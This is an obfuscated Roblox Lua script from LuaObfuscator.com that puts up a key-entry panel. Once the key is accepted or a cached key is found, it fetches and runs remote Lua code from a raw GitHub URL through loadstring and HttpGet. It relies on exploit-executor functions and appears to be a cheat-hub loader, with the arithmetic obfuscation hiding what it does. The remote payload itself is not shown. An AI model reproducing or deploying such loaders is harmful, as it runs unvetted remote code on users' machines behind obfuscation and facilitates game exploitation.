--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=v1:WaitForChild("PlayerGui");local v3=game:GetService("HttpService");local v4="imightretire:/";local v5="lead_hub_key.json";local v6="https://raw.githubusercontent.com/RedfireFc/Content-lol/refs/heads/main/read%20hub.txt";local v7=false;local v8=nil;pcall(function() if isfile(v5) then local v17=readfile(v5);local v18=v3:JSONDecode(v17);if (v18 and (v18.key==v4)) then v7=true;end end end);if  not v7 then local v9=0 + 0 ;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v9==6) then v15.Font=Enum.Font.GothamBold;v15.TextScaled=true;v15.BackgroundColor3=Color3.fromRGB(1270 -(226 + 1044) ,170,255);v15.TextColor3=Color3.fromRGB(255,1110 -855 ,372 -(32 + 85) );Instance.new("UICorner",v15).CornerRadius=UDim.new(0,6);v9=7;end if (v9==(5 + 0)) then Instance.new("UICorner",v14).CornerRadius=UDim.new(0 + 0 ,6);v15=Instance.new("TextButton",v11);v15.Size=UDim2.new(0.8,957 -(892 + 65) ,0 -0 ,73 -33 );v15.Position=UDim2.new(0.1 -0 ,350 -(87 + 263) ,180.65 -(67 + 113) ,0 + 0 );v15.Text="Submit";v9=14 -8 ;end if (v9==(1 + 0)) then v11.Position=UDim2.new(0.5, -(596 -446),0.5, -100);v11.BackgroundColor3=Color3.fromRGB(987 -(802 + 150) ,94 -59 ,63 -28 );v11.BorderSizePixel=0 + 0 ;v12=Instance.new("UICorner",v11);v12.CornerRadius=UDim.new(997 -(915 + 82) ,22 -14 );v9=2 + 0 ;end if (v9==7) then v16=Instance.new("TextButton",v11);v16.Size=UDim2.new(0.8 -0 ,1187 -(1069 + 118) ,0 -0 ,65 -35 );v16.Position=UDim2.new(0.1,0 + 0 ,0.85 -0 ,0);v16.Text="Copy Key Link";v16.Font=Enum.Font.Gotham;v9=8 + 0 ;end if (v9==(795 -(368 + 423))) then v14.Position=UDim2.new(0.1 -0 ,18 -(10 + 8) ,0.4 -0 ,442 -(416 + 26) );v14.Font=Enum.Font.Gotham;v14.TextColor3=Color3.fromRGB(814 -559 ,110 + 145 ,255);v14.BackgroundColor3=Color3.fromRGB(96 -41 ,493 -(145 + 293) ,485 -(44 + 386) );v14.TextScaled=true;v9=1491 -(998 + 488) ;end if (v9==(0 + 0)) then v10=Instance.new("ScreenGui",v2);v10.Name="KeySystem";v10.ResetOnSpawn=false;v11=Instance.new("Frame",v10);v11.Size=UDim2.new(0,246 + 54 ,772 -(201 + 571) ,1338 -(116 + 1022) );v9=4 -3 ;end if (v9==(6 + 3)) then v15.MouseButton1Click:Connect(function() if (v14.Text==v4) then v7=true;pcall(function() writefile(v5,v3:JSONEncode({key=v14.Text}));end);v10:Destroy();loadstring(game:HttpGet(v6))();else local v60=0 -0 ;while true do if ((0 -0)==v60) then v14.Text="";v14.PlaceholderText="Wrong Key. Try again.";break;end end end end);break;end if (3==v9) then v13.BackgroundTransparency=860 -(814 + 45) ;v13.Font=Enum.Font.GothamBold;v14=Instance.new("TextBox",v11);v14.PlaceholderText="Enter Key Here";v14.Size=UDim2.new(0.8,0 -0 ,0 + 0 ,15 + 25 );v9=889 -(261 + 624) ;end if (v9==(3 -1)) then v13=Instance.new("TextLabel",v11);v13.Size=UDim2.new(1081 -(1020 + 60) ,0,0,50);v13.Text="Enter Key to Continue";v13.TextColor3=Color3.fromRGB(255,1678 -(630 + 793) ,863 -608 );v13.TextScaled=true;v9=14 -11 ;end if (v9==(4 + 4)) then v16.TextScaled=true;v16.BackgroundColor3=Color3.fromRGB(100,100,100);v16.TextColor3=Color3.fromRGB(877 -622 ,2002 -(760 + 987) ,255);Instance.new("UICorner",v16).CornerRadius=UDim.new(1913 -(1789 + 124) ,772 -(745 + 21) );v16.MouseButton1Click:Connect(function() setclipboard("https://link-target.net/1373858/5uR0HSNzkIVu");end);v9=9;end end else loadstring(game:HttpGet(v6))();end
